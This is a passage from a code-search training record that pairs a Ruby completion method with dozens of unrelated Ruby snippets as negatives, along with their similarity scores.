"def reset_flags\n @flags = { :zero => false , :plus => false ,\n :minus => false , :overflow => false }\n end",
"def xlate_flags()\n flags = []\n flags.push('More') if (flag_more?)\n flags.push('Start') if (flag_start?)\n flags.push('Stop') if (flag_stop?)\n flags.push('Watchdog') if (flag_watchdog?)\n return(\"#{flags.join(',')}\") if (flags.length != 0)\n return(\"None\")\n end",
"def literal_false\n BOOL_FALSE\n end",
"def effective_flags\n @effective_flags ||= flag_syntax.flat_map(&:flags)\n end",
"def masking?; false; end",
"def folly_flags()\n return NewArchitectureHelper.folly_compiler_flags\nend",
"def build_flags(*flags)\n _flags = *flags\n\n unless _flags.is_a?(Integer)\n _flags = MAGIC_NONE\n\n flags.flatten.each { |flag|\n if value = flag.is_a?(Integer) ? flag : MAGIC_FLAGS[flag.to_sym]\n _flags |= value\n else\n raise ArgumentError, \"#{value.nil? ? 'no such flag' : 'flag not available'}: #{flag}\"\n end\n }\n end\n\n _flags\n end",
"def validate_flags\n return if @flags == [false, true, false, false]\n raise ProtocolException, 'Invalid flags in PUBREL packet header'\n end",
"def test_stringflag_unset\n @p.opt :xyz, \"desc\", :type => :stringflag\n @p.opt :abc, \"desc\", :type => :flag\n opts = @p.parse %w()\n assert_equal false, opts[:xyz]\n assert_equal false, opts[:abc]\n opts = @p.parse %w(--abc)\n assert_equal false, opts[:xyz]\n assert_equal true, opts[:abc]\n end",
"def not(e)\n ((1 << 64) - 1) & (~eval_ex(e))\n end",
"def short_flag_exist?(flag)\n flags.select { |f| f.short == flag }.any?\n end",
"def negative?\n value < 0\n end",
"def flagged?\n !(%w(flagged) & flags).empty?\n end",
"def int64()\n # Read an unsigned value, then convert it to signed\n val = _uint64(\"int64\")\n\n val >= 2**63 ? -(2**64 - val): val\n end",
"def can_overflow?\n false\n end",
"def test_neg_check_fail\n assert_equal neg_check(['0', '-1', '0']), false # return false\n assert_equal neg_check(['0', '0', '-1']), false # return false\n assert_equal neg_check(['0', '-9', '-9']), false # return false\n end",
"def isnegative(siffra)\n output = false\n if siffra < 0\n output = true\n end\n\n return output\nend",
"def make_signed_int32(long); end",
"def flag_options\n return @flag_options unless @flag_options.nil?\n @flag_options = ''\n @flag_options << ' --auto-attach' if new_resource.auto_attach\n @flag_options << ' --force' if new_resource.force\n @flag_options << ' --insecure' if new_resource.insecure\n @flag_options\n end",
"def test_negative_should_have_the_right_option_count\n assert_equal(all_options.count, cli_options.count)\n end",
"def two_or_more\n -3\n end",
"def complete_flags?\n @complete_flags\n end",
"def flag_stop!\n if (!flag_stop?)\n @flags = @flags | TAC_PLUS_ACCT_FLAG_STOP\n else\n @flags = @flags & (~TAC_PLUS_ACCT_FLAG_STOP)\n end\n return(nil)\n end",
"def initialize(options={})\n super\n raise ArgumentError, \"arg_name specified for switch: #{arg_name}\" if arg_name\n raise ArgumentError, \"no long specified\" unless long\n @negative_long = Utils.prefix_long(long, 'no-')\n end",
"def is_negative(num)\n if num < 0\n return true\n end\n return false \nend",
"def feature_flags\n 0\n end",
"def is_negative(number)\n output = false\n if number < 0\n output = true\n end\n return output\nend",
"def options\n [['--build32', 'Force a 32-bit build.']]\n end",
"def local_options opts\n -1\n end",
"def is_negative(num)\n return false if num >= 0\n return true if num < 0\nend",
"def switches\n [long, negative_long, short].compact\n end",
"def test_stringflag_as_flag\n @p.opt :xyz, \"desc\", :type => :stringflag\n @p.opt :abc, \"desc\", :type => :flag\n opts = @p.parse %w(--xyz )\n assert_equal true, opts[:xyz_given]\n assert_equal true, opts[:xyz]\n assert_equal false, opts[:abc]\n opts = @p.parse %w(--xyz --abc)\n assert_equal true, opts[:xyz_given]\n assert_equal true, opts[:xyz]\n assert_equal true, opts[:abc]\n end",
"def negative?\n self < ZERO\n end",
"def verification_flags=(_arg0); end"
] | [
"0.7005071",
"0.64586365",
"0.63733387",
"0.6301711",
"0.6210912",
"0.59782505",
"0.5870798",
"0.58574307",
"0.5744593",
"0.56635636",
"0.5610551",
"0.56060874",
"0.55889356",
"0.5546935",
"0.55281043",
"0.5511223",
"0.54754025",
"0.54588413",
"0.5454476",
"0.5445743",
"0.5418295",
"0.539358",
"0.5388296",
"0.5376985",
"0.53727",
"0.5371617",
"0.53623194",
"0.5353122",
"0.53491163",
"0.53490424",
"0.5344563",
"0.531543",
"0.5311942",
"0.5311942",
"0.53085804",
"0.53010106",
"0.53010106",
"0.52782357",
"0.5276066",
"0.5243675",
"0.5243675",
"0.5240085",
"0.51952255",
"0.5194592",
"0.51820475",
"0.5175899",
"0.5174165",
"0.5155009",
"0.51548386",
"0.5153348",
"0.5153341",
"0.515332",
"0.5150798",
"0.51467294",
"0.51405865",
"0.5134538",
"0.512591",
"0.51251113",
"0.51235664",
"0.5119556",
"0.51169837",
"0.5112999",
"0.5108587",
"0.5102974",
"0.5101413",
"0.50976646",
"0.50930303",
"0.50925094",
"0.5091668",
"0.5089132",
"0.5087605",
"0.50825036",
"0.5080679",
"0.5076475",
"0.5063017",
"0.5056649",
"0.5055299",
"0.50546116",
"0.5044141",
"0.5040847",
"0.50354564",
"0.50248647",
"0.5024851",
"0.5024025",
"0.5016979",
"0.5005984",
"0.5005958",
"0.500239",
"0.49975324",
"0.49932992",
"0.49846774",
"0.4983643",
"0.49793792",
"0.4978184",
"0.49706894",
"0.49635243",
"0.49578908",
"0.4955199",
"0.49550232",
"0.4946841"
] | 0.5779511 | 8 |
Returns candidates for the current completion. | def call(context)
results =
if @include_short && @include_long && @include_negative
@flag.effective_flags
else
collect_results
end
fragment = context.fragment
results.find_all { |val| val.start_with?(fragment) }
.map { |str| Completion::Candidate.new(str) }
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def candidates\n players.map(&:candidate).compact\n end",
"def candidates(s)\n res = []\n candidates_helper(s, 0, res)\n res\n end",
"def find_candidates\n scout(exp: expression, depth: 0)\n end",
"def file_candidates\n @file_candidates ||= []\n end",
"def qualified_candidates(candidates)\n\tcandidates.select do |candidate|\n\t\tqualified?(candidate)\n\tend\nend",
"def qualified_candidates(candidates)\n qualified_candidates = []\n candidates.each do |candidate|\n if experienced?(candidate) && github(candidate) && languages(candidate) && applydate(candidate) && applyage(candidate)\n qualified_candidates << candidate\n end\n end\n return qualified_candidates\nend",
"def possible_completions(token)\n start_position = redis.zrank(completion_set, token)\n return [] unless start_position\n redis.zrange(\n completion_set,\n start_position,\n start_position + 49\n )\n end",
"def candidates\n players = []\n players += Player.where(:position => \"QB\").first(20)\n players += Player.where(:position => \"RB\").first(20)\n players += Player.where(:position => \"WR\").first(20)\n players\n end",
"def by_candidate\n placements =\n by_target.to_a.flat_map { |t, cs| cs.map { |c| [c, t] } }.to_h\n candidates.map { |c| [c.object, placements[c.object]] }.to_h.freeze\n end",
"def max_candidates\n return @max_candidates\n end",
"def matchingCandidates(token)\n candidates(@currentNode, token)\n end",
"def call(context)\n candidates = valued_flag_candidates(context)\n return candidates if candidates\n candidates = subtool_or_arg_candidates(context)\n candidates += plain_flag_candidates(context)\n candidates += flag_value_candidates(context)\n if delegation_target\n delegate_tool = context.cli.loader.lookup_specific(delegation_target)\n if delegate_tool\n context = context.with(previous_words: delegation_target)\n candidates += delegate_tool.completion.call(context)\n end\n end\n candidates\n end",
"def qualified_candidates(candidates)\n begin\n @candidates.select do |candidate|\n experienced?(candidate) &&\n enough_points?(candidate) &&\n proper_languages?(candidate) &&\n applied_recently?(candidate) &&\n old_enough?(candidate)\n end\n rescue CandidateError => ex\n puts \"There was an error in finding qualified candidates. The reason was #{ex.message}\"\n end\nend",
"def active_job_candidate_list\n @job_candidates = JobCandidate.active_job_candidate_list(current_candidate)\n end",
"def candidate\n candidates.first\n end",
"def qualified_candidates(candidates)\n puts \"Candidates that meet your specs:\"\n\n qualified = candidates.select do |c|\n experienced?(c)\n has_enough_github_pts?(c) &&\n has_right_languages?(c) &&\n applied_within_15_days?(c) &&\n is_of_age?(c)\n end\nend",
"def completions_for(token)\n results = []\n possible_completions(token).each do |entry|\n return results unless matches?(token, entry)\n if complete_word?(entry)\n results << entry\n return results if entry == token\n end\n end\n results\n end",
"def qualified_candidates(candidates)\n array = []\n candidates.each do |candidate| \n if experience?(candidate) && languages?(candidate) && last_15_days?(candidate) && over_17?(candidate)\n array << candidate\n end\n end\n array\nend",
"def get_completions(prefix)\n return []\n end",
"def suggest(options)\n candidates_to_exclude = options[:exclude]\n validation_block = options[:validate]\n number_of_suggestions = options[:num_suggestions]\n\n results = []\n candidates = name_combinations.clone\n while results.size < number_of_suggestions && !candidates.blank?\n candidate = candidates.shift\n if validation_block.try(:call, candidate)\n # Don't add the candidate to result\n elsif candidates_to_exclude.include? candidate\n candidates << find_extended_candidate(candidate, candidates_to_exclude)\n else\n results << candidate\n end\n end\n\n results\n end",
"def method_completions\n\n return if @method_completions.empty?\n @method_completions.uniq.sort\n\n end",
"def remaining_candidates\n case strategy.to_sym\n when :symmetric\n candidates.reject { | candidate | candidate.full? || candidate.exhausted_preferences? }\n when :asymmetric\n candidate_set1.values.reject { | candidate | candidate.full? || candidate.exhausted_preferences? }\n end\n end",
"def run\n while ( rcs = remaining_candidates ).any?\n rcs.each do | candidate |\n while !candidate.exhausted_preferences? && candidate.free?\n candidate.propose_to_next_preference\n end\n end\n end\n self\n end",
"def qualified_candidates(candidate_list)\n candidate_list.select {|candidate| qualified?(candidate)}\nend",
"def perform\n candidates.each { |candidate| propose(candidate) }\n @matches\n end",
"def suggest(options)\n candidates_to_exclude = options[:exclude]\n number_of_suggestions = options[:num_suggestions]\n\n results = []\n candidates = name_combinations.clone\n while results.size < number_of_suggestions && !candidates.blank?\n candidate = candidates.shift\n if candidate.length <= 4\n # Don't add the candidate to result\n elsif candidates_to_exclude.include? candidate\n candidates << find_extended_candidate(candidate, candidates_to_exclude)\n else\n results << candidate\n end\n end\n\n results\n end",
"def protocol_completion\n return protocol_completion_without_future if instance_options[:with_protocol_completion]\n\n []\n end",
"def completion_callback( input )\n\t\tself.log.debug \"Input completion: %p\" % [ input ]\n\t\tparts = Shellwords.shellwords( input )\n\n\t\t# If there aren't any arguments, it's command completion\n\t\tif parts.length == 1\n\t\t\t# One completion means it's an unambiguous match, so just complete it.\n\t\t\tpossible_completions = @command_table.keys.grep( /^#{Regexp.quote(input)}/ ).sort\n\t\t\tself.log.debug \" possible completions: %p\" % [ possible_completions ]\n\t\t\treturn possible_completions\n\t\telse\n\t\t\tincomplete = parts.pop\n\t\t\tself.log.warn \"I don't yet do programmable or file completion.\"\n\t\t\treturn []\n\t\tend\n\tend",
"def known_suggestions\n @known_suggestions ||= SUGGESTIONS.constants.map do |suggestion_class|\n SUGGESTIONS.const_get(suggestion_class).new\n end\n end",
"def swing_candidates\n @result = Election.find_swing()\n puts @result\n end",
"def complete(search); Bond::DefaultMission.completions; end",
"def set_candidates(pv)\n @candidates = pv\n @value = @initial_value\n end",
"def get_candidates(consistent_read)\n candidates = []\n params = {\n table_name: candidates_table_name,\n consistent_read: consistent_read\n }\n\n loop do\n result = @database.scan(params)\n\n # Convert votes to an integer and add the candidate to the candidates array.\n result.items.each do |candidate|\n candidate['votes'] = candidate['votes'].to_i\n candidate['contributions'] = candidate['contributions'].to_i\n candidates << candidate\n end\n\n break if result.last_evaluated_key.nil?\n\n params[:exclusive_start_key] = result.last_evaluated_key\n end\n\n candidates\n end",
"def get_candidates\n\t$cand_table.each do |x|\n\t\tputs \"Give me a candidate name:\"\n\t\tx[0] = gets.chomp\n\tend\nend",
"def remaining_candidates\n @candidate_deck - candidates\n end",
"def selection( )\n if @completion.is_a?(Array)\n @completion\n elsif [File, Pathname].include?(@completion)\n Dir[File.join(@directory.to_s, @glob)].map do |file|\n File.basename(file)\n end\n else\n [ ]\n end\n end",
"def get_next_scent_candidates(priority, completed_training)\n # ------------------------------------------------------------------\n # priority : Integer, option parameter\n # completed_training: Smell_Program instance which is being replaced\n #\n # Priority for automatic selection of new scents:\n # 1 - new scents in a different category\n # 2 - new scents in the same category\n # 3 - new scents in any category\n # 4 - paused scents in different category\n # 5 - paused scents in same category\n # 6 - paused scents in any category\n #\n # returns : Array of Scent instances\n # ------------------------------------------------------------------\n case priority\n when 1 then inactive_scents_by_category(inactive_scent_categories)\n when 2 then inactive_scents_by_category(completed_training.scent.category)\n when 3 then Scent.all - scents\n when 4 then scents_by_category_and_status(inactive_scent_categories, \"pending\")\n when 5 then scents_by_category_and_status(completed_training.scent.category, \"pending\")\n when 6 then scents_by_category_and_status(Scent.categories, \"pending\")\n else []\n end\n end",
"def suggest_results\n repository.auto_suggest(suggest_handler_path, request_params)\n end",
"def qualified_candidates(list_of_candiates)\n sort_all_candidates(list_of_candiates.select do |person|\n experienced?(person) \\\n && over_requisite_github_points(person, REQ_GITHUB_PTS) \\\n && has_required_languages(person, LANGUAGE_LIST) \\\n && applied_during_right_period(person, APPLIED_WITHIN_DAYS) \\\n && of_age?(person, AGE_OVER)\n end)\nend",
"def suggestions\n # If we haven't registered an autocomplete, just return the empty set\n return [] if @autocomplete_config.nil?\n Dromedary::Suggest::Response.new suggest_results, request_params, autocomplete_config\n end",
"def build!\n set1.each do | target , options |\n candidate =\n Candidate.new \\\n target,\n *( options.first.is_a?( Array ) ? options : [ options ] )\n\n candidates.push candidate\n candidate_set1[ target ] = candidate\n end\n\n set2.each do | target , options |\n candidate =\n Candidate.new \\\n target,\n *( options.first.is_a?( Array ) ? options : [ options ] )\n\n candidates.push candidate\n candidate_set2[ target ] = candidate\n end\n\n candidate_set1.each do | target , candidate |\n candidate.preferences =\n candidate.raw_preferences.map { | preference_target | candidate_set2[ preference_target ] }\n end\n\n candidate_set2.each do | target , candidate |\n candidate.preferences =\n candidate.raw_preferences.map { | preference_target | candidate_set1[ preference_target ] }\n end\n\n # We've built the candidates\n self.built = true\n end",
"def autocomplete_results\n return @results if @results\n return cached_results if cached?\n\n @results = search_words.flat_map do |word|\n completions_for(word).flat_map { |token| fetch_results(token) }\n end\n @results = sorted_results(@results).first(limit)\n cache_results(@results)\n @results\n end",
"def candidate\n @candidate\n end",
"def awaiting_candidate_events\n candidate_events.select(&:awaiting_candidate?)\n end",
"def list_candidates(path, options = { })\n return path.map { |p| list_candidates(p, options) } if path.is_a?(Array)\n\n command_line = [ '-l' ]\n command_line << '-r' if options[:recursive]\n command_line << '-v' if (verbose = options[:verbose])\n command_line << '-D' if options[:debug]\n\n stripe_group = options[:stripe_group]\n command_line << '-G' << stripe_group if stripe_group\n\n affinity_key = options[:affinity_key]\n command_line << '-K' << affinity_key if affinity_key\n\n minimum_extents = options[:minimum_extents]\n command_line << '-m' << minimum_extents if minimum_extents\n\n command_line << path\n raw_response = execute(command_line)\n return raw_response if options.fetch(:return_raw_response, return_raw_response)\n\n raise raw_response if raw_response.start_with?('Error: ')\n\n candidates = [ ]\n raw_response.each_line { |c| _c = c.strip; next if c.empty? or c.nil?; candidates << _c }\n\n candidates.compact!\n\n return candidates unless verbose and options.fetch(:parse_verbose_data, parse_verbose_data)\n\n candidates.map do |c|\n match = /(.*):\\s?(\\d+)\\sextent[s]?:\\s?(.*)/.match(c)\n next unless match\n { :path => $1, :extent_count => $2, :message => $3}\n end.compact\n end",
"def lookup_completion(name)\n @completions.fetch(name.to_s) { |k| @parent ? @parent.lookup_completion(k) : nil }\n end",
"def results\n @mutex.synchronize do\n resolvables = @resolvables\n @resolvables = []\n return resolvables\n end\n end",
"def rl_possible_completions(ignore, invoking_key)\r\n rl_complete_internal('?')\r\n end",
"def completion_list\n groups = ::Guard.groups.map { |group| group.name.to_s }\n guards = ::Guard.guards.map { |guard| guard.class.to_s.downcase.sub('guard::', '') }\n\n COMPLETION_ACTIONS + groups + guards - ['default']\n end",
"def index\n @completions = Completion.all\n end",
"def map_current_candidates\n\t\tobj = Candidate.all\n\t\tobj.map { |i| {i.id => i.name} }\n\tend",
"def find_selected\n selected_quests = self.user_quests.where(complete: false)\n selected_quests.map do |x|\n x.quest_id\n end\n end",
"def candidate\n self['candidate']\n end",
"def find *args, &block\n found = []\n found << tasks.first if args.empty?\n if args.include? 'all'\n found = tasks\n elsif args.include? 'first'\n found << tasks.first\n elsif args.include? 'last'\n found << tasks.last\n elsif args.include?('complete') || args.include?('completed')\n found = tasks.select { |task| task.complete? }\n elsif args.include? 'incomplete'\n found = tasks.select { |task| not task.complete? }\n elsif args.any? { |arg| arg =~ /(\\d+)\\.\\.(-?\\d+)/ }\n found = tasks[$1.to_i..$2.to_i]\n else\n tasks.each_with_index do |task, i|\n found << task if args.any? { |a| a.to_i == i }\n end\n end\n found.each_with_index do |task, i|\n yield task, i\n end\n end",
"def search\n @start = starting_point\n return [] if start.nil?\n while continue_search?\n result = iterate\n break if early_trigger?(result)\n end\n results\n end",
"def get_candidate_list\n raise NoMethodError, 'get_candidate_list should be defined in subclass of HillClimb'\n end",
"def suggestions\n response.try(:[], \"suggest\").try(:[], @suggest_key).try(:[], request_params[:q]).try(:[], \"suggestions\") || []\n end",
"def suggestions\n perform_request_with_collection(:get, '/api/v1/accounts/suggestions', {}, Mastodon::Account)\n end",
"def fast_suggestions query\n return []\n end",
"def candidate_paths\n # All leaf categories for this product family. This is an array\n # of hashes. Each hash has keys :catid and :path.\n candidates = self.product_family.leaf_category_paths\n\n # All leaf category ids that were previously selected for this\n # product. This will be a subset of the candidates.\n current = self.leaf_ids\n\n candidates.each do |lcp|\n if current.include? lcp[:catid]\n lcp.merge! :selected => true\n else\n lcp.merge! :selected => false\n end\n end\n candidates\n end",
"def final_completed_assignments \n self.all_completed_assignments.select {|a| a.current }\n end",
"def getCandidates (data, len)\n\t\tresult = Array.new\n\t\tdata.each do |s|\n\t\t\tlst = Array.new\n\t\t\tsumChars = self.charsSum (s)\n\n\t\t\tprep = s.split(//).collect{|x| repeat(self.letterToInt(x),\"1\")} #list of blocks\n\n\t\t\tself.genSequence(prep, len - sumChars + 1).each do |r|\n\t\t\t\tbits = r[1,r.size-1].split(//)\n\t\t\t\tbitset = Array.new(bits.size,false)\n\t\t\t\tfor i in 0...bits.size\n\t\t\t\t\tbitset[i] = (bits[i]=='1')\n\t\t\t\tend\n\t\t\t\tlst.push(bitset)\n\t\t\tend\n\t\t\tresult.push(lst)\n\t\tend\n\t\treturn result\n\tend",
"def index\n @candidates = Candidate.where(user_id: current_user.id)\n end",
"def suggest_results\n Blacklight.default_index.connection.send_and_receive(suggest_handler_path, params: request_params)['suggest']\n end",
"def suggest_completion_venues(params, callbacks = {}, &block)\n return unless params[:query].length > 2\n request(:get, \"venues/suggestcompletion\", params, callbacks) do |response|\n block.call(response[\"minivenues\"])\n end\n end",
"def get_results\n\t\tputs \"\"\n\t\twinner = nil\n\t\t@candidates.each do |candidate|\n\t\t\t@winner ||= candidate\n\t\t\t@winner = candidate if @votes.count(candidate) > @votes.count(@winner)\n\t\t\tsleep(1)\n\t\t\tputs \"#{candidate.name} has #{@votes.count(candidate)} votes.\"\n\t\tend\n\t\tsleep(1)\n\t\tputs \"\\n#{@winner.name} won the election!\"\n\tend",
"def suggested_people\n SuggestedPeople.people(@api_key, @https)\n end",
"def auto_completions\n\n comps =\t \"{ name = 'Completions';\\n\"\n comps += \"scope = 'source.actionscript.3';\"\n comps += \"settings = \"\n comps += \"{\\n\\tcomment = '#{@framework} completion list';\"\n comps += \"\\n\\tcompletions = (\"\n\n elements =\t@class_names +\n @method_names +\n @protected_method_names +\n @constant_names +\n @property_names +\n @protected_properties\n\n elements = elements.uniq.sort\n\n elements.each do | item |\n comps += \"'\" + item + \"'\"\n comps += \",\" if item != elements.last\n end\n\n comps += \");\\n};\\nuuid = '\" + `uuidgen`.chomp + \"'; };\\n}\"\n\n end",
"def infobox_candidates(infobox)\n return @infobox_cache[infobox] unless @infobox_cache[infobox].nil?\n @infobox_cache[infobox] = candidate_set_for_name(infobox,@category_filters)\n end",
"def suggestions\n suggest(search_suggestions)\n end",
"def rl_completion_matches(text, entry_function)\r\n matches = 0\r\n match_list = []\r\n match_list[1] = nil\r\n while (string = send(entry_function, text, matches))\r\n match_list[matches+=1] = string\r\n match_list[matches+1] = nil\r\n end\r\n\r\n # If there were any matches, then look through them finding out the\r\n # lowest common denominator. That then becomes match_list[0].\r\n if (matches!=0)\r\n compute_lcd_of_matches(match_list, matches, text)\r\n else # There were no matches.\r\n match_list = nil\r\n end\r\n return (match_list)\r\n end",
"def build_candidates\n doc = Nokogiri::HTML(open(\"http://www.google.com/search?q=#{query}&num=30\"))\n doc.xpath('//div/cite').each do |node|\n @candidates << Sanitize.clean(node)\n end\n\n @candidates = @candidates.collect{|c| c if c.include?(\"http\") && (c.include?(\"youtube.com\") || c.include?(\"soundcloud.com\") || c.include?(\"bandcamp.com\")) }.compact\n\n #replace each with url, score, and title\n set = []\n\n @candidates.each do |c|\n if c.include?(\"youtube\")\n set << get_youtube(c)\n elsif c.include?(\"soundcloud\")\n set << get_soundcloud(c)\n elsif c.include?(\"bandcamp\")\n set << get_bandcamp(c)\n end\n end\n\n @candidates = set\n @candidates.sort!{|x,y| y[:score] <=> x[:score]}\n puts @candidates.count\n end",
"def suggestions\n @users = User.all.to_ary.select { |user| user != current_user &&\n !current_user.to_fr_ids.include?(user.id) &&\n !current_user.friends.include?(user) &&\n !current_user.from_fr_ids.include?(user.id)\n }\n @requests = current_user.received_friend_requests\n end",
"def scan_resume_all\n\t\t\tb=scan_list_uids\n\t\t\tb.each {|uuid|\n\t\t\t\tscan_resume(uuid)\n\t\t\t}\n\t\t\treturn b\n\t\tend",
"def sent_proposals\n reversed_matches = Array.new(@group_size)\n @best_proposals.each_with_index do |e, i|\n reversed_matches[e] = i if e\n end\n reversed_matches\n end",
"def resolved_ids\n return get_and_remove_done(@resolvers).map(&:id)\n end",
"def index\n # @candidates = Candidate.all\n @candidates = Position.find(params[:position_id]).candidates\n end",
"def candidates_included_in_all_the_others(candidates_in_correct_position)\n\tcandidates_in_correct_position.each do |small|\n\t\tok = true\n\t\tcandidates_in_correct_position.each do |big|\n\t\t\tif small!=big\n\t\t\t\tunless big.source.position.include?(small.source.position)\n\t\t\t\t\tok = false\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\treturn small if ok\n\tend\n\tnil\nend",
"def max_candidates=(value)\n @max_candidates = value\n end",
"def qualified_candidates (collection)\n match=[]\n \n collection.each do |x|\n if years_of_experience(x[:years_of_experience]) && github_points(x[:github_points]) && knowledge(x[:languages]) && applied_time(x[:date_applied]) && old_enough(x[:age])\n match << (x)\n end\n end\n\n match\nend",
"def index\n @candidates = Candidate.all\n end",
"def index\n @candidates = Candidate.all\n end",
"def index\n @candidates = Candidate.all\n end",
"def index\n @candidates = Candidate.all\n end",
"def index\n @candidates = Candidate.all\n end",
"def term_candidates(cyc_id)\n return @term_cache[cyc_id] unless @term_cache[cyc_id].nil?\n @term_cache[cyc_id] = create_candidate_set(\"\",[@name_service.find_by_id(cyc_id)])\n end",
"def converge_complete\n detect_unprocessed_resources\n end",
"def index\n @candidates = Candidate.limit(100)\n end",
"def suggest(query_term)\n @qt = query_term\n @candidates = Candidates.new\n srs = for_term(@qt)\n\n srs.each do |seg|\n @lex.search(seg).each do |result|\n found(result)\n end\n end\n\n # Run substring rules\n # Check confidence\n # Run ngrams\n # Return most confident candidate set\n return @candidates\n end",
"def term_candidates(cyc_id)\n return @term_cache[cyc_id] unless @term_cache[cyc_id].nil?\n @term_cache[cyc_id] = create_candidate_set(\"\",[@name_service.find_by_id(cyc_id)])\n end",
"def lookup_proposals\n return RAILS_CACHE.fetch_object(\"proposals_for_event_#{self.id}\") do\n self.proposals\n end\n end",
"def scan_resume_all\r\n\t\tb=scan_list_uids\r\n\t\tb.each {|uuid|\r\n\t\t\tscan_resume(uuid)\r\n\t\t}\r\n\t\treturn b\r\n\tend",
"def completed\n candidate_events.select(&:completed?)\n end",
"def candidates_below_default\n Array(@ranking[@default_rank+1...@ranking.length]).flatten.sort\n end",
"def open_job_candidates\n authorize(JobCandidate.new)\n if active_job_candidate_list.present?\n @open_job_candidates = active_job_candidate_list.includes(:job)\n .where(\"job_candidates.status in (?)\",\n JobCandidate.statuses_opened)\n .page(params[:page])\n end\n end",
"def complete(original_terms, prefix, subject)\n #cache isn't valid of the basis changes\n list = possible_completions(prefix, subject)\n matcher = @completion_matchers[prefix] ||= completion_matcher(original_terms, prefix, list, subject)\n\n begin\n Timeout::timeout(CompletionDeadline) do\n matcher.find_completions\n end\n rescue Timeout::Error\n #That's ok.\n end\n\n return matcher.response\n end",
"def selected\n tasks = []\n @widget.selection.selected_each do |model, path, iter|\n tasks << iter[0]\n end\n return tasks\n end",
"def item_target_candidates\r\n if item.for_opponent?\r\n opponents_unit.alive_members\r\n elsif item.for_user?\r\n [subject]\r\n elsif item.for_dead_friend?\r\n friends_unit.dead_members\r\n else\r\n friends_unit.alive_members\r\n end\r\n end",
"def with_candidates &b\n # Multiple assignment reduces (s)teps while debugging\n outermost, @candidates, @on_admission = @candidates.nil?, (@candidates || []), (@on_admission || [])\n begin\n b.call\n rescue Exception\n # Do not accept any of these candidates, there was a problem:\n @candidates = [] if outermost\n raise\n ensure\n if outermost\n while @candidates\n # Index the accepted instances in the constellation:\n candidates = @candidates\n on_admission = @on_admission\n @candidates = nil\n @on_admission = nil\n candidates.each do |instance|\n instance.class.index_instance(self, instance)\n loggers.each{|l| l.call(:assert, instance.class, instance.identifying_role_values)}\n end\n on_admission.each do |b|\n b.call\n end\n end\n end\n end\n end",
"def list_optimized total, candidate: 2\n primes = []\n while primes.count < total\n prime = next_prime candidate\n primes << prime\n candidate = prime.next\n end\n primes\n end"
] | [
"0.6400225",
"0.6264429",
"0.6093053",
"0.60641855",
"0.60383046",
"0.59851754",
"0.59327793",
"0.59178853",
"0.5872673",
"0.58314174",
"0.58277404",
"0.5827605",
"0.57802844",
"0.57467395",
"0.5732374",
"0.5730715",
"0.57088095",
"0.5698806",
"0.5693608",
"0.5651471",
"0.55478907",
"0.5505228",
"0.54691106",
"0.54657596",
"0.5450331",
"0.5448238",
"0.54439634",
"0.5429537",
"0.54168713",
"0.54134405",
"0.5401506",
"0.539839",
"0.53975606",
"0.5379803",
"0.53731954",
"0.5363461",
"0.5355942",
"0.53335804",
"0.52979416",
"0.52953094",
"0.52939093",
"0.5287536",
"0.5258772",
"0.52545714",
"0.52393585",
"0.523923",
"0.52222335",
"0.5166094",
"0.51652515",
"0.5146323",
"0.5134337",
"0.51262826",
"0.5112659",
"0.50970745",
"0.5096827",
"0.5095957",
"0.5090813",
"0.5070825",
"0.5063286",
"0.5055548",
"0.50458825",
"0.5044335",
"0.50363326",
"0.5029763",
"0.5002799",
"0.49940398",
"0.49851543",
"0.4979928",
"0.49779323",
"0.49671665",
"0.4956082",
"0.49434292",
"0.49363327",
"0.4934917",
"0.49319512",
"0.4931584",
"0.49252483",
"0.49138802",
"0.49026546",
"0.48999113",
"0.48806614",
"0.48806614",
"0.48806614",
"0.48806614",
"0.48806614",
"0.48773596",
"0.4876549",
"0.48748434",
"0.4831362",
"0.4830017",
"0.4817561",
"0.4813881",
"0.48112294",
"0.48090443",
"0.48074457",
"0.480716",
"0.47979838",
"0.47857153",
"0.47855628",
"0.4780523"
] | 0.57600236 | 13 |
An array of Flag::Syntax including only short (single dash) flags. | def short_flag_syntax
@short_flag_syntax ||= flag_syntax.find_all { |ss| ss.flag_style == :short }
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def dashed_flags *settings_and_names\n settings_and_names.map{|args| dashed_flag_for(*args) }.compact\n end",
"def matching_flag_strings\n @flags.map do |_flag, flag_syntax, negative|\n negative ? flag_syntax.negative_flag : flag_syntax.positive_flag\n end\n end",
"def flags\n [long, short].compact\n end",
"def flags\n [long, negative_long, short].compact\n end",
"def flags\n return [] unless options[\"flags\"]\n options[\"flags\"].map do |options|\n Flag.new options\n end\n end",
"def long_flag_syntax\n @long_flag_syntax ||= flag_syntax.find_all { |ss| ss.flag_style == :long }\n end",
"def flags\n match(/Flags\\s+:\\s+(.+)$/).split rescue []\n end",
"def flags\n match(/Flags\\s+:\\s+(.+)$/).split rescue []\n end",
"def effective_flags\n @effective_flags ||= flag_syntax.flat_map(&:flags)\n end",
"def to_argv\n flags = []\n each do |f,v|\n m = f.to_s.size == 1 ? '-' : '--'\n case v\n when Array\n v.each{ |e| flags << \"#{m}#{f}='#{e}'\" }\n when true\n flags << \"#{m}#{f}\"\n when false, nil\n # nothing\n else\n flags << \"#{m}#{f}='#{v}'\"\n end\n end\n flags\n end",
"def flags\n flags = Array.new\n if self.flag_attr\n self.flag_attr.split(\", \").each do |flag|\n flags << flag.to_sym\n end\n end\n\n return flags\n end",
"def canonical_syntax_strings\n @canonical_syntax_strings ||= flag_syntax.map(&:canonical_str)\n end",
"def generate_cli_flags\n @flags.map{|pair| pair.join(' ')}.join(' ').gsub(' true','')\n end",
"def valid_options\n %i(\n\n ) # end array\n end",
"def scm_flags\n @flags.join(\" \")\n end",
"def flag\n flags.join(\", \")\n end",
"def flag_args(ci_gcc_config)\n return [] if ci_gcc_config[:flags].nil?\n\n ci_gcc_config[:flags]\n end",
"def whitelisted_flags\n flags.select &:allowed\n end",
"def flag_list(flag, list)\n list&.map do |value|\n \"#{flag}=#{value}\"\n end\n end",
"def flag_list(flag, list)\n list&.map do |value|\n \"#{flag}=#{value}\"\n end\n end",
"def switches\n [short, long].map(&:to_s)\n end",
"def optparse_args\n if short\n [\"--#{name}\", \"-#{short}\", desc, :REQUIRED]\n else\n [\"--#{name}\", desc, :REQUIRED]\n end\n end",
